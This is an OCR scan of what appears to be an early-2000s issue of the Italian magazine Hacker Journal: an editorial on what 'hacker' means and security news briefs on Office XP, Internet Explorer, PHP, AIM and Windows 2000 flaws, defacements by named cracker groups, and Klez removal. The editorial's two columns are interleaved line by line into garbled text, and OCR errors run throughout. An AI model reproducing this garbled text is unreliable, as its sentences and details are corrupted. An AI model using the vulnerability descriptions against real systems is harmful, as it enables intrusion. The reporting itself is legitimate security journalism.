


>}SSM 














Gli autori sono tutti raggiungibili via e-mail 
e ICQ: compllmentatevi^ritlcated^ncazzatevi 


ma soprattutto 


hack’er (hàk’ar) 

“Persona che si diverte ad esplorare i dettagli dei sistemi t di programmazione 
e come espandere le loro capacità, a differenza di molti utenti, che preferiscono 
imparare solamente il minimo necessario." 


Haclcer, Cracker Defacement... Termini che 
a qualcuno potranno suonare strani, incom¬ 
prensibili, forse, anche divertenti. Chi sono gli 
Hacker, cosa fanno ma, soprattutto, parafra¬ 
sando cinema e letteratura, dove vanno? For¬ 
se la definizione più vicina al concetto di Hac¬ 
ker non è quella di "incursore", di attentatore 
alla sicurezza informatica, ma quella di curio¬ 
so, di persona che vuole ampliare la propria 
conoscenza informatica, che avidamente è at¬ 
tratta da tutto quello che ruota intorno al set¬ 
tore tecnologico e della sicurezza. Quindi for¬ 
se l'hacker e un buono... E il cattivo? Se fossi¬ 
mo in film di Sergio Leone potrebbe essere il 
"Cracker", colui che entra nei sistemi solo per 
provocare dei "disastri". Forse... Abbiamo de¬ 
finito il Buono, il Cattivo, ci rimane la "voce 
narrante", un ruolo che ci ritagliamo volentie¬ 
ri noi di Hacker Journal con il vostro persona¬ 
lissimo contributo: anzi aiutateci voi a capire 
chi sono i buoni e chi sono i cattivi. Magari, un 
giorno, potrebbe venire voglia di schierarci 
pure a noi... 

bomber78@hackerjournal.it 


(istruzioni per l'uso) 


• •••• e state leggendo que- quasi completamente ignorato dalla 

sto editoriale, vuol dire stragrande maggioranza dei suoi fruito- 

99 che il numero uno di HJ ri: la sicurezza informatica. 

• • è in edicola: magari vi Avevo qualche perplessità riguardo al 
•••••• starete chiedendo che titolo di questo periodico: la parola 'fioc¬ 
cosa diavolo avete comprato; che cosa ker' non mi piace e non mi è mai piaciu- 

sta dietro ad una idea come quella che ta. E' ambigua, ad oggi priva di senso. Se 

avete tra le mani, se davvero possa rite- da un lato (quello dell'utenza di massa) 

nersi intelligente la trovata di togliersi la identifica erroneamente qualsiasi perso- 

maschera e proporsi alla gente (a tutta na che compia atti illeciti sfruttando le 

la gente) in un luogo diverso dalla rete: proprie conoscenze informatiche, dall'al- 

al di fuori dei protocolli di comunicazio- tro (quello degli addetti ai lavori) equi¬ 

ne tra macchine e aldilà di nick e proxy 1 . vale a un qualcosa di puramente mistico, 
server. e presentarsi ad un newsgroup che trat- 

Quando mi venne proposto di collabo-T ta di sicurezza dicendo: "Salve a tutti, so¬ 
rare alla realizzazione di un mensile de- no un hacker" equivale più o meno ad 

dicato al mondo dell'hacking anche io mi entrare al solito bar esordendo con "Sal- 

domandai immediatamente: "A che ve a tutti, sono Dio"... Identica sarà l'ila- 

pro?" e subito dopo: "Non esiste in Italia rità suscitata. 

una rivista dedicata all'underground, co- Ma in una maniera o nell'altra occor- 
me mai? Che senso avrebbe?" re presentarsi. Ed eccoci qui: ciò che vor- 

Ma, a conti fatti, devo dire che un sen- remmo fare è semplicemente trattare 

so l'abbiamo trovato, o quantomeno ab- p— una specifica branca dell'informatica, 

biamo cercato di trovarlo: questo nostro un'area della conoscenza che troppo 

povero Paese soffre di una cronica igno- spesso viene descritta alle persone solo e 

ranza scientifica, e anche informatica. unicamente dalle farneticazioni di qual- 

Sempre più di sovente, ad ogni livello che giornalista ignorante; o trattata in 

sociale, il computer, ed in particolare le modo ultraspecifico e ultratecnico dai po- 

reti di computer, giocano un ruolo di chi "esperti" che, lavorando in questo 

estrema importanza: sia da un punto di settore, non hanno alcun interesse (ed è 

vista lavorativo che di puro svago, così comprensibilissimo) a perder tempo nel- 

come da un punto di vista didattico, l'in- la divulgazione. 

formatica si impone come media e si Quello che vorremo riuscire a fare con 
scontra con l'allarmante arretratezza del HJ è proprio colmare questo buco: offrire 
nostro background culturale. un appoggio a chi si interessa di questi 

Ciò che forse dovrebbe dar da pensa- argomenti, soddisfare la curiosità di chi 
re è la velocità con cui questo fenomeno si avvicina per la prima volta al mondo 
si è verificato ed espanso: in pochissimi underground. 

anni siamo stati (e in parte siamo anco- Nello specifico, non ci interessa dar le- 
ra) protagonisti di una rivoluzione me- 1 zioni morali a nessuno; manifesti e 're- 
diatica di ampie proporzioni. Forse non gole per essere un hacker' le lasciamo a 

tutti sono abituati alla fulminea rapidità chi ha voglia di dedicarsi a politica e filo- 

con cui l'informatica si evolve, ed è nor- sofia spicciola, noi vogliamo solo appas- 

male che sia così: ciò ha fatto si, purtrop- sionare... 

po, che uno degli aspetti più importanti A sentirci gente! 

che internet&CO si portano dietro sia ganjìaman@hackerjoumaUt - ICQ n" 66876309 
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> NUOVE FALLE 
IN OFFICE XP 

P roprio il giorno di Pasqua il celeberrimo 
bug hunter Georgi Guninski ha rilasciato 
un bollettino dove venivano documentate 
due nuove falle di sicurezza che affliggono 
Office XP. La prima vulnerabilità riguarda 
Outlook XP: sarebbe possibile l'inserimento, 
in una email html, di uno script in grado 
di autoeseguirsi ogni volta che si risponde 
a un messaggio o lo si inoltra ad altri 
indirizzi di posta elettronica. 

La seconda falla riguarda invece 
una funzione di un componente di Excel: 
"Questa funzione bacata - spiega Guninski - 
permette la creazione di file con nome 
arbitrario e contenuto vario, il tutto è 
sufficiente per infilare un file eseguibile 
“.hta" nella directory di avvio dell'utente, 
cosa che potrebbe portare a prendere 
il pieno controllo del computer di un utente". 
Maggiori info: 

http://www.guninski.com/m$oxp- 
2.html. gl 
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O NASCE IL PRIMO 
VIRUS PER SAP R/3 

/ I sistema operativo preferito dai virus 
coder (Windows) inizia forse ad essere 
"saturo" di codici maliziosi, in primis worm 
e affini. Così i vari coder hanno sfornato 
questo primo esperimento: il SAPvir infetta 
le piattaforme industriali SAP R/3 
con solo 24 linee di codice e dimostra 
come sia possibile, sfruttando l'Advanced 
Business Application Programming (ABAP - 
il liguaggio integrato in R/3) un piccolo 
worm che, ad oggi, non riesce ancora 
a diffondersi in rete. 

I responsabili della SAP hanno dichiarato 
che comunque la piattaforma è sicura. & 


O RAINEWS24: SITQ BUCATO O SCARSA 
PROFESSIONALITÀ DEI GIORNALISTI? 



o aveva segnalato anche "Striscia la noti¬ 
zia": sul sito di RaiNews24, chiamando una 
pagina interna e non linkata pubblicamente, 
ma presente sul web e a disposizione di tutti, 
si poteva accedere nientemeno che ad una 
news annunciarne la morte del Papa. 

La pagina è stata preparata dai giornalisti per 
poter uscire per primi con la succulenta notizia 
nel caso di una improvvisa dipartita del ponte¬ 
fice, o si è trattato di un'azione di cracking? 
RaiNews24 ha ammesso che la biografia del 
Papa era già pronta sulle proprie pagine (è una 
cosa abbastanza normale per un giornale) ma 
che sarebbe stata resa pubblica da ignoti crac- 
kers. 

Sarà, ma qualche dubbio resta... SI 


O BUCA IL SITO VERSIONE KOREANA: MA IL PREMIO 
ARRIVA A 100.000 DOLLARI! 


Il na azienda coreana di sicurezza 
U informatica - la Korea Digital 
Works - ha messo in palio una gros¬ 
sa cifra per chi riuscirà nell'intento 
di bucare un loro server di nuova 
concezione protetto da una piatta¬ 
forma appositamente sviluppata dal¬ 
l'azienda. 

L’esperimento ricorda un po' quello 
tutto nostrano di "buca il sito" che 
ha avuto un grande seguito dalle no¬ 
stre parti. 

Il concorso, della durata di 48 ore, 



prevede che l'azienda fornisca le 
specifiche del sistema da attacca¬ 
re solo due ore prima dell'inizio del¬ 
la gara. 

Per dimostrare di essere riusciti a 
"entrare" occorrerà modificare un 
documento HTML all'Interno del 
server, inserendo un codice ricevu¬ 
to in fase di registrazione. 
L'ennesima buttata pubblicitaria: a 
quando un concorso del tipo 
"trombamiamoglie.com" lanciato 
da un sito porno? 


O ENNESIMA FALLA PER MICROSOFT INTERNET 
EXPLORER 



internet 
Explorer 5 

p«r Macintosh 


■ a Microsoft ha rilasciato l'ennesima patch 
L per Internet Explorer, forse il più bacato 
browser di navigazione in circolazione, croce 
e delizia di milioni di utenti internet che devo¬ 
no fare quotidianamente i conti con i proble¬ 
mi che lo affliggono. 

Si tratta di una cumulative patch che tappa 
svariati bachi di Explorer. 


Tra questi una definita "critica" secondo cui 
sarebbe consentito ad un aggressore di "in¬ 
globare all'Interno di un cookie uno script in 
grado di essere eseguito all'interno dell'area 
di protezione di IE "Intranet locale". 
Quest'ultima è assai meno restrittiva rispetto 
a quella "Internet" tipicamente assegnata agli 
script scaricati dal Web" (Microsoft). 

Con questa patch viene anche eliminata la fa¬ 
mosa e diffusa vulnerabilità che consentireb¬ 
be ad una pagina HTML maliziosa di lanciare 
programmi residenti sulla macchina dell’uten¬ 
te che la visualizza. 

La patch e maggiori informazioni si possono 
reperire all'indirizzo internet: 

http://www.microsoft.com/tech- 
net/treeview/default.asp?url=/tech 
net/security/bulletin/MS02- 
015.asp. SI 
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O SIKUREZZA.ORG 

■ i uova mailìng list per il sito Sikurezza.org. 
IV Si chiama Devel ed è mirata in particolar 
modo ai settori della sicurezza 
e del networking. L'invito è quello 
di partecipare inviando tutto quello che possa 
in qualche modo essere utile ad approfondire 
ed esplorare questi aspetti del segmento 
informatico soprattutto: messaggi d'aiuto, 
messaggi riguardanti implementazioni 
di algoritmi di vario genere, tecniche 
di programmazione che possono ledere 
la sicurezza e metodi per la risoluzione 
del problema. Inoltre, codice dimostrativo 
riguardante vulnerabilità, codice che illustra 
tecniche di programmazione sicura 
o insicura, pubblicità di progetti opensource 
e qualsiasi altra cosa sia relativa 
aH'argomento programmazione, li 



O SYMANTEC: 

FIREWALL LINUX 

S ymantec annuncia la disponibilità 
di un firewall hardenizzato che gira 
su piattaforma Iseries Linux di IBM 
e che permetterà di proteggere gli iSeries 
o altre macchine sulla rete dell'azienda. 

Il firewall è una versione personalizzata 
di Enterprise Firewall di Symantec 
per i server che montano Windows e Solaris 
e sarà disponibile nella seconda metà 
del 2002. & 


3 LA FINE DI WINDOWS MESSENGER 


□ 


S iete stufi della presenza invasiva di Win¬ 
dows Messenger per Windows XP? L’avete 
disattivato due milioni di volte eppure continua 
a riproporsi con ostinata determinazione? Bene, 
anzi male, ma non disperate perché sembra sia 
stato individuato un sistema rapido per sbaraz¬ 



zarsi in modo definitivo di questa presenza in¬ 
quietante. La soluzione arriva da The Register, 
nota Webzine che ha messo on-line un piccolo 
file batch di un proprio lettore, direttamente 
scaricabile dal sito, che sembra funzionare a 
meraviglia ed eliminare tutti gli effetti collatera¬ 
li delle precedenti soluzioni: come la modifica di 
alcune impostazioni del registro attraverso lo 
script di sistema "gpedit.msc" lanciabile a riga 
di comando (Configurazione Computer -> Mo¬ 
delli Amministrativi -> Componenti di Win¬ 
dows -> Windows Messenger). In linea di 
massima l'operazione funziona ma il caricamen¬ 
to di Outlook Express viene rallentato in modo 
evidente, perché quest'ultimo, all'avvio, cerca 
disperatamente (sic!) Windows Messenger 
tentando di eseguirlo. £i 


O GYMNASIUM: UN SERVER/PALESTRA 
PER ALLENARSI CON HACKER JOURNAL 




W a c k e r 
Journal 
sta pensando 
di lanciare 
l'operazione 
Gymnasium. 
In pratica 
vorremmo aprire un server dedicato per consentir¬ 
vi di fare tutti i vostri più biechi esperimenti e di di¬ 
ventare "incursori per un giorno". Sia per mettere 
in pratica quanto appreso in linea teorica sulla rivi¬ 
sta, sia per provare l'ebbrezza di sferrare attacchi 
informatici senza fare danno alcuno (insomma 


comportarsi da perfetto Cracker): una bella pale¬ 
stra per allenarsi in cui confluiranno, probabilmen¬ 
te, anche iniziative vere e proprie, e competizioni a 
chi riuscirà per primo a "bucare" il sistema. Cosa 
ne pensate? Vorremmo davvero conoscere la vo¬ 
stra opinione per calibrare in modo adeguato que¬ 
sta che ci sembra un'iniziativa davvero interessan¬ 
te. Scrivete la vostra idea e vostri eventuali sugge¬ 
rimenti, circa questa particolare iniziativa e in rife¬ 
rimento anche al giornale nel suo complesso. La 
mail da usare è gymnasium@hackerjournal.it: la 
palestra potrebbe diventare realtà già dal prossimo 
numero! SI 



/ bug di sicurezza sarebbero contenuti nella 
funzione "php_mime_split'‘ di PHP e riguarde¬ 
rebbero il modo in cui alcune versioni del lin¬ 
guaggio gestiscono le richieste di tipo "POST 
multipart/form-data", anche conosciute come 


"fileuploads". Le versioni di PHP vulnerabili sa¬ 
rebbero numerose, fra cui buona parte di quelle 
comprese fra la 3.10 e la 4.1.1. Tali bug potreb¬ 
bero consentire ad un utente di inserirsi in re¬ 
moto in un sistema eseguendo un codice arbi¬ 
trario, oppure di mandare a gambe all'aria tutto 
il sistema. Peraltro è stato specificato come la 
vulnerabilità sia circoscritta alle versioni di PHP 
che girano su Web server Linux o Solaris. Per 
mettersi al riparo da ogni rischio è necessario 
aggiornare PHP alla versione 4.1.2 o scaricare 
le patch.. Se non è possibile effettuare aggior¬ 
namenti, per le versioni di PHP pari o superiori 
alla 4.0.3 si può intervenire manualmente dis¬ 
abilitando la funzione "file_uploads" dal file 
php.ini. Sì 


"IL COMPUTER È CAPACE DI PENSARE PROPRIO QUAN¬ 
TO UN SOTTOMARINO DI NUOTARE". 

Edsgar 1D. Dijkstra 





































O DENIAL OF SERVICE SULLA PIATTAFORMA 
WINDOWS 2000 


f i stata riscontrata una vulnerabilità nel para- 
mentri dopo l'installazione di Windows 
2000 . 

Si verificherebbe di default la possibilità che la 
chiave di registro LANMAN permetta ad un at- 



tacker di causare un Denial Of Service (DoS) su 
di una piattaforma Widows 2000 causando co¬ 
si la totale occupazione della CPU facendo cras- 
hare il Sistema. Si 

Mappa dei sistemi affetti: 

La vulnerabilità è riferita ai seguenti sistemi: 

- Windows 2000 Server (SP0, SPI, SP2) 

- Windows 2000 Advanced Server (SP0, SPI, 
SP2) 

- Windows 2000 Professional (SP0, SPI, SP2) 

Soluzione: 

La patch è scaricabile all'indirizzo: 

http://support.microsoft.com/default.aspx7s 
cid = kb;en-us;Q320751 


O UN PREMIO AGLI HACKER? 


Ì t hacker questo sconosciuto, una specie in 
via di estinzione, come il capriolo alpino, 
questo almeno secondo l'ANFoV, l'associazione 
per la convergenza nei servizi di comunicazio¬ 
ne, che ha indetto il concorso "Nella rete con¬ 
tro la rete? Comprendere il fenomeno hackers", 
con un premio di 2.500 euro per chi contribui¬ 
rà a fare chiarezza sul fenomeno hackers in Eu¬ 
ropa. Fino al 31 ottobre 2002 c'è tempo per fa¬ 
re pervenire le proprie riflessioni sul mondo de¬ 
gli hacker, sia su supporto cartaceo che audio¬ 
visivo. Per chi volesse partecipare tutte le in¬ 
formazioni del caso trovano spazio sul sito del- 
l’Anfov. SI 



3 COMPRESSIONE TRAVAGLIATA 
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/ formati di compressione Mpeg hanno contri¬ 
buito a spingere le applicazioni tecnologiche 
molto avanti, si pensi solo ai formati Mpeg 1 e 
2 che sono i protocolli di compressione utilizza¬ 
ti per ottenere i file audio MP3 largamente dif¬ 
fusi in rete. Ora l'attenzione sembra spostarsi 


sul sistema Mpeg-4 che consente di "strizzare" 
in modo ancora più efficace i file video a audio 
permettendone un'agevole diffusione in rete. Il 
problema è che il formato Mpeg4, il cui brevet¬ 
to appartiene ad un gruppo di società radunate 
sotto il cartello MPEG LA, rischia di monopoliz¬ 
zare di fatto tutto il mercato audio e video di¬ 
ventando lo standard normale di compressione. 
Questo preoccupa soprattutto le società con¬ 
correnti, come la 0n2, che lavorano a standard 
alternativi per i file di video compressione. Il tut¬ 
to è finito davanti al Dipartimento di Giustizia 
americano che dovrà decidere se lo sviluppo del 
sistema MPEG4 è legittimo o se viola le leggi 
dell’Antitrust, rischiando così di creare un car¬ 
tello di società in grado di dominare il mercato 
e stabilire prezzi con completa discrezionalità, 
tagliando fuori tutte quelle società che non vor¬ 
ranno o non potranno convertirsi al nuovo 
MPEG4. SI 


3 IL TERRIBILE "DUO" 

S i chiamano Deceptive Duo, sono tra i 
cracker più temuti degli Stati Uniti in 
questo momento. Sono riusciti a violare con 
facilità irrisoria sistemi informatici di rilevanza 
strategica. Secondo loro per dimostrare la 
vulnerabilità delle strutture informatiche 
U.S.A., specie dopo i fatti dell'11 settembre 
che giustificherebbero una soglia di 
attenzione ben superiore. 

Il primo e più rilevante sito "craccato" dal 
Deceptive Duo è stato quello del U.S. Space 
and Naval Ware Systems Command 
(http://enterprise.spawar.navy.mil/spawarp 
ublicsite/ (il Comando per i sistemi di 
combattimento spaziale e navale), seguito 
poi da siti di compagnie aeree 
(www.camairsa.co.za, 
www.saudiairlines.com, 
www.iflyrga.com), banche 
(www.unionbank.com), siti di cultura 
religiosa (www.falwell.com) e siti 
governativi (extra-cas.faa.gov). d 


O PROBLEMI 
DI SICUREZZA 
SU PLAYER INTERNET 

S ono a rischio Windows Media Player 
e RealOne Player di RealNetworks, due 
dei sistemi più diffusi per vedere filmati in 
rete. Contengono un baco che consente 
di effettuare attacchi di tipo DoS, sui sistemi 
vittima. La scoperta è stata fatta per caso 
da alcuni siti pornografici, che hanno usato 
la falla per reindirizzare i browser degli utenti 
proprio sui loro indirizzi. Si 
























































O UN CACCIATORE DI TAGLIE 
IN CASA MICROSOFT 


□ 


O INSTANT 

MESSAGING "SPIATI" 

«I essuno si deve sentire più al sicuro, 

III neanche chi comunica attraverso instant 
messages, ossia i messaggi inviati 
da programmi come ICQ. Infatti FaceTime 
Communications ha messo a punto 
un programma capace di monitorare tutto 
il traffico degli instant messages, 
consentendo di configurare alcune parole 
chiave che allertino chi deve controllare, 
oppure registrando tutto il traffico su un hard 
disk, a partire da un dato momento. SI 

O UNA BELLA 
"MAPPATURA" 

DEL SITO DELLA CIA 

Ì a società di sicurezza informatica Matta 
a scopo dimostrativo è riuscita 
a disegnare una mappa dettagliata 
del network della CIA, usando solo tool 
pubblici e motori di ricerca. In particolare 
tramite i comandi 'whois' che agiscono 
sui database dei nomi a dominio e Google, 
è stato possibile ricostruire la struttura 
dei web server relativi ai sottodomini, 
individuare i router, le loro interfacce, 
e perfino gli indirizzi IP del network interno. 
Questo, tuttavia, non è un sintomo diretto 
di vulnerabilità del sito, ma comunque 
un dato che deve fare pensare a prescindere 
dalle misure di protezione da accessi 
indesiderati che sono sicuramente state 
adottate dalla CIA. SI 

O NUOVA LEGGE 
ANTI-HACKER 

Ì a Commissione 
Europea sta 
valutando nuove 
proposte di legge 
per incriminare gli 
internet hackers e i 
creatori di virus. Gli 
analisti di settore e 
gli esperti di security 
hanno accolto con 
parere favorevole le 
proposte, ma molto 

deve ancora essere fatto affinché le aziende 
consce della cattiva pubblicità, inizino a 
riportare gli attacchi subiti tramite internet 
mettendo così in moto i meccanismi legali 
per prevenire il cybercrime. SI 



Ì a Microsoft ha ri¬ 
velato il nome 
del nuovo respon¬ 
sabile dei sistemi di 
sicurezza, si tratta 
di Scott Charney 
che prende il posto 
di Howard Schmidt, 
che ha lasciato Mi¬ 
crosoft per divenire 
il consigliere per la 
sicurezza elettroni¬ 
ca nell'amministra- 
zione Bush. Charney deve la sua fama alle im¬ 
prese che lo hanno visto protagonista negli An¬ 
ni Novanta, quando era responsabile della divi¬ 


sione "crimini informatici" al Dipartimento 
americano. 

A Charney viene attribuito un ruolo centrale 
nell'individuazione dei cracker e phreaker di 
"Legion of Doom" (LOD), una delle più note 
crew nei primi Anni '90, molto attiva e di cui si 
è parlato tantissimo anche sugli organi di stam¬ 
pa specializzati e non. 

Certo il lavoro di Charney non sarà tra i più 
semplici, vista la quantità di problemi che af¬ 
fiorano quotidianamente sulla sicurezza di ser¬ 
ver e lan basati su sistemi Windows, comun¬ 
que la "sfida" si profila interessante. Saprà il 
buon Charney ridare credibilità alla sicurezza 
dei software Microsoft? Ai posteri l'ardua sen¬ 
tenza. SI 


DON'T CRACK FOR ME ARGENTINA 


D opo il crack finanziario che ha sconvolto i 
paese sudamericano, in Argentina si 
torna a parlare di Crack, ma questa vol¬ 
ta informatico. Un noto team di 
cracker conosciuto come X-Team è 
stato accusato di essere entrato 
sul web della Corte Suprema del¬ 
l'Argentina e di aver modificato 
alcuni dei contenuti presenti su 
quel sito. In particolare X-Team 
aveva inserito sul sito accuse alla 
Corte, sostenendo che non si stava oc¬ 
cupando a dovere dell'omicidio di un giorna¬ 
lista, Jose Luis Cabeza. 



Ma nonostante questa intromissione il gruppo 
di cracker l'ha passata liscia, infatti in su- 
damerica non esiste una legge che 
punisca atti criminosi contro siste¬ 
mi informatici. 

Né la giurisprudenza serve a col¬ 
mare questa lacuna. Dunque 
l'Argentina si pone come paese 
franco per tutti coloro che voglia¬ 
no "sfondare" in tutta tranquillità 
server e reti. Per la cronaca un altro 
"paradiso piratesco" è rappresentato 
dalle Filippine dove non esiste nessuna 
normativa a riguardo. SI 




Ì a notizia è divertente e curiosa. Diversi 
utenti che hanno acquistato Pc con Office 
XP di Microsoft preinstallato, hanno denuncia¬ 
to la comparsa nei propri documenti di frasi o 
parole che loro non avevano mai scritto. 

Gli utenti in questione probabilmente avranno 
anche pensato di essere sull'orlo di una crisi di 


nervi ma la spiegazione c'è ed è tutto som¬ 
mato semplice. 

Secondo Microsoft, il problema è da ricercarsi 
nell'opzione di riconoscimento vocale presente 
all'interno di Office Xp: questa sarebbe stata 
attivata come predefinita da alcuni rivenditori 
poco avveduti, all'atto della preinstallazione 
del software su Pc destinati alla vendita. 

In questo modo, numerosi Pc appena usciti 
dagli scaffali hanno assunto un comportamen¬ 
to strano e in qualche modo inusuale: l’opzio¬ 
ne di riconoscimento vocale ha fatto si che ru¬ 
mori, esclamazioni o, peggio, improperi, venis¬ 
sero codificati e inseriti nel documento di vi¬ 
deoscrittura sotto forma di testo. 

La soluzione è facile: basta disattivare l’opzio¬ 
ne di riconoscimento vocale o, almeno, evita¬ 
re di collocare il Pc vicino alla toilette, per evi¬ 
tare preoccupanti interpretazioni di suoni e ru¬ 
mori. Si 
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O SYMANTEC GATEWAY SECURITY 5000 


□ 


^ Symantec 


S ymantec presenta la sua appliance hardwa¬ 
re, tra le più avanzate, per combattere su 5 
fronti le minacce dall'esterno e le intrusioni in¬ 
desiderate. 

Il Symantec Gateway Security 5000 avrà la 
possibilità di fare firewall, software anti-virus a 


livello gateway, intrusion detection, content fil- 
tering e VPN (Virtual private networking). 

E 1 possibile effettuare il managment da una GUI 
fornita con l'appliance. 

Il Firewall è derivato da Symantec Enterprise 
Firewall 7.0, l'antivirus da Navex engine men¬ 
tre il componente VPN compatibile ipsec è 
Symantec Enterprise VPN 7.0. Sarà possibile 
avere aggiornamenti automatici dell'appliance 
tramite Liveupdate e verrà venduta in 3 confi¬ 
gurazioni per 50, 250 e 1000 nodi. a 



Z> THE BIG BLUE ALLA RISCOSSA... 


I D flil sta mettendo a punto un nuovo 

I D IVI software anti-pirateria che limita, di 
fatto, la possibilità di scambiare e duplicare 
software. In pratica sarà possibile decidere, da 
parte delle società produttrice, se limitare la 
circolazione, ad esempio, di un file MP3 ad una 
sola copia, inibendo le successive e quindi im¬ 
pedendo le catene di Sant'Antonio informati¬ 
che, oppure se limitarne l'ascolto a soli 30 se¬ 
condi o se impedirne del tutto la circolazione. 

II nuovo standard IBM prevede una serie di in¬ 
teressanti di possibilità, come quella che con¬ 
sentirà di decidere quante copie del file potran¬ 
no essere realizzate da chi ne entra in posses¬ 


so, oppure se la riproduzione sarà totalmente 
inibita. Questo a prescindere dal sistema di dif- 1 
fusione: via internet o e-mail. 

Il sistema di protezione agirà a 360 gradi sia I 
per quanto concerne i file MP3, quindi l'indu¬ 
stria discografica, sia per i DVD, che per i soft- 1 
ware. I 



O KLEZ.E SI RIMUOVE SU ZDNET 


□ 



S i è parlato e ultimamente e, c'è da giurarsi, 
se ne riparlerà in futuro, di Klez.e un simpa¬ 
tico worm che si attiva il 6 di ogni mese e so¬ 
vrascrive tutti i file con estensioni: .txt", 
".htm", ".html", ".wab", ".doc", ".xls", ".jpg", 
".cpp", ".c", ".pas", ".mpg", ".mpeg", ".bak" e 
".mp3“. Klez si diffonde a causa di un buco di 
Outlook Express. 


Per evitare di prendere il worm basta scaricare 
la patch di Outlook, tuttavia per chi si fosse, 
ahilui, già infettato, è possibile rimuovere Klez 
con la seguente procedura: 

Entrate nel registro di sistema (Start -> Ese¬ 
gui quindi digitate Regedit) 

*Cercate e selezionate la chiave HKEYLO- 
CAL_MACHINE>Software> Microsoft 
Windows 

> CurrentVersion > Run 

*Nella finestra di destra cercate le chiavi 
WINK* *.EXE e WQK.EXE e cancellatele. 

*Se avete fatto la scansione online cancellate 
anche tutte le chiavi che fanno riferimento ai fi¬ 
le che sono risultati infetti. 

Quindi passate un antivirus, potete approfittare 
di quello messo a disposizione on-line da zdnet 
all'indirizzo: http://www.zdnet.it/antivirus, 
per verificare la rimozione del worm, e il gioco 
è fatto! SI 


TruSecure 5. 


O ASSICURAZIONE 
CONTRO I CRACKER 

Ì e polizze assicurative americane 
prevedono la copertura per rischi quali 
'attacchi 1 di virus, assalti di 'denial 
of Service', defacement del proprio sito 
e accessi non autorizzati. 

Nel 2001 sono state vendute polizze 
di questo tipo per 100 milioni 
di dollari, ma gli analisti del settore 
prevedono che questa cifra si decuplicherà 
entro il 2007. Una posizione leader in questo 
settore è quella dell'americana AIG 
che detiene il settanta per cento 
del mercato, e il costo medio delle polizze 
stesse si aggira intorno alle centinaia 
di migliaia di dollari annui. 

O BACKOFFICE 
A RISCHIO 

f istata scoperta una vulnerabilità 
sul sistema di autenticazione di Back 
Office Web Administration, in cui un attacker 
potrebbe bypassare la pagina di logon 
del Back Office Web Administration. 

Sistemi affetti: 

Microsoft's Back Office Web Administrator 
4.0, 4.5. a 

3 8.0 LINUX 

n ilasciato SuSE 8.0 Linux, 
fi Tra le maggiori novità troviamo 
l'inclusione di KDE 
3.0, del kernel 
2.4.18, 
e del firewall 
che sta avendo 
molto successo 
per la sua 
semplice 
installazione, 
come è 
caratteristico 
delle applicazioni 
del "pinguino", a 










































O CON LO SPAMMING 
FINO A DIECI MILIONI 
DI MULTA 

M andare in giro e-mail 
pubblicitarie e non 
a go-go, potrebbe dare 
luogo a spiacevoli 
sorprese. 

Infatti il Decreto 185/99 
all'articolo 10 sancisce 
l'illegittimità dello spamming senza il previo 
consenso del consumatore, ovvero 
dell'anello finale della catena, colui 
che riceve il messaggio pubblicitario. 

In quanto reato lo spamming viene punito 
con un'ammenda da 500 a 5.000 euro. 

Su questo punto ritorna anche la più recente 
direttiva della Comunità Europea 
sul commercio elettronico (8.6.2000 n.31), 
che prevede corretto l'invio 
di comunicati pubblicitari solo in assenza 
di un'esplicita opposizione da parte 
del destinatario. Spetta a quest'ultimo 
esprimere un rifiuto facendosi inserire 
negli appositi registri istituti a tale scopo. @1 


O VULNERABILITÀ AIM 

Ijr na vulnerabilità di security in AIM 
U permetterebbe ad un attacker di rubare 
files destinati ad altri, o effettuare un attacco 
di tipo man in thè middle tra due utenti 
di AIM. Potrebbe essere possibile 
per un attacker ricevere informazioni che 
viaggiano tra due utenti, ed utilizzare queste 
informazioni per impersonare uno dei due 
utenti. Quando AIM riceve una richiesta 
di connessione o prova a connettersi 
a qualcun altro agisce come un server, 
un programma che si connette rapidamente 
all'IP di destinazione (ogni 450 millisecondi) 
sulla porta 4443 (Direct Connection) e 5190 
(File Transfer) sarebbe in grado di prelevare 
qualsiasi file pronto per il file transfer. li 



mi etscreen ha aggiunto un chip ASIC dedi- 
IV cato alla sua linea di appliances per fire¬ 
wall e VPN per migliorarne la velocità di 
trhoughput. 

La serie NetScreen-5000, basata su Giga- 
Screen-ll ASIC, aumenta la velocità del fire¬ 
wall fino a 12 Gigabits per secondo e la velo¬ 
cità delle Virtual private network (VPN) fino a 
6 Gbps. 

La serie NetScreen-5000 comprende anche il 
NetScreen-5200, che è stato recentemente in¬ 
trodotto in Europa ad InfoSecurity, e il Net- 
Screen-5400 (che triplica le performances del 
5200), e sarà disponibile nel terzo trimestre. 
Tutte le informazioni sui prodotti Netscreen e, 
in particolare, sulla serie 5000 trovano ampio 
spazio sul sito ufficiale della società che si può 


raggiungere all'indirizzo http://www.net- 
screen.com/products/NS5000.html. SI 



O CRITTOGRAFIA OTTICA. 


□ 



screti. Liu per arrivare 


J ia-ming Liu (nella 
foto), un docente di 
ingegneria elettrica al¬ 
la UCLA di Los Angeles 
(USA), ha fatto quella 
che potrebbe diventare 
una scoperta significa¬ 
tiva nel settore delle 
comunicazioni "critta- 
te" ovvero codificate in 
modo da renderle illeg¬ 
gibili da occhi indi- 
a questa interessante 


conclusione ha provato ad inviare parte di un fa¬ 


scio laser a dei fotorilevatori che producono un 
segnale elettrico di feedback per dare energia al 
laser stesso. 

Questo circuito si comporta in modo erratico, 
un po' come il feedback degli amplificatori acu¬ 
stici e Liu ha notato come scegliendo accurata¬ 
mente due fasci laser si possano costruire due 
circuiti non lineari (caotici) il cui feedback è 
identico. 

Per cui, sincronizzando due laser in città diver¬ 
se, si può inviare un segnale crittato in questo 
modo attraverso fibre ottiche senza che alcuna 
intercettazione possa decodificarlo, come è sta¬ 
to sperimentato, ad una velocità di 2.5 Gbps. S 


O INSTANT MESSAGING CRIPTATO 


□ 


r> ilasciata una soluzione per l'instant mes¬ 
ti saging criptato. ClPHERim prodotto da 
Cleartext (http://www.cleartext.com.au). 

Il sistema mette a disposizione una piattafor¬ 
ma Client server crittografata di instant mes- 
saging per l'utilizzo all'interno di aziende di ti¬ 
po corporate. 

Una scelta sapiente degli algoritmi e della di¬ 
mensione delle chiavi fa in modo che la piat¬ 
taforma non soffra dei tempi di attesa tipici 
delle soluzioni di crittografia. 

Infatti alla prima comunicazione verranno 
scambiate le chiavi che resteranno valide per 
tutto il periodo della sessione. 

Si tratta di una soluzione particolarmente in¬ 
teressante proprio in un periodo in cui si par¬ 
la di un interesse di diverse major a intercet¬ 
tare gli instant messenger per studiare le abi¬ 
tudini dei consumatori e non solo. 

Il settore della crittografia si presenta del re¬ 



sto come uno dei più in crescita e la sua ap¬ 
plicazione viene ormai estesa a tutte le forme 
di comunicazione tecnologica con lo scopo 
evidente di preservarne la privacy costante- 
mente in pericolo. SI 









































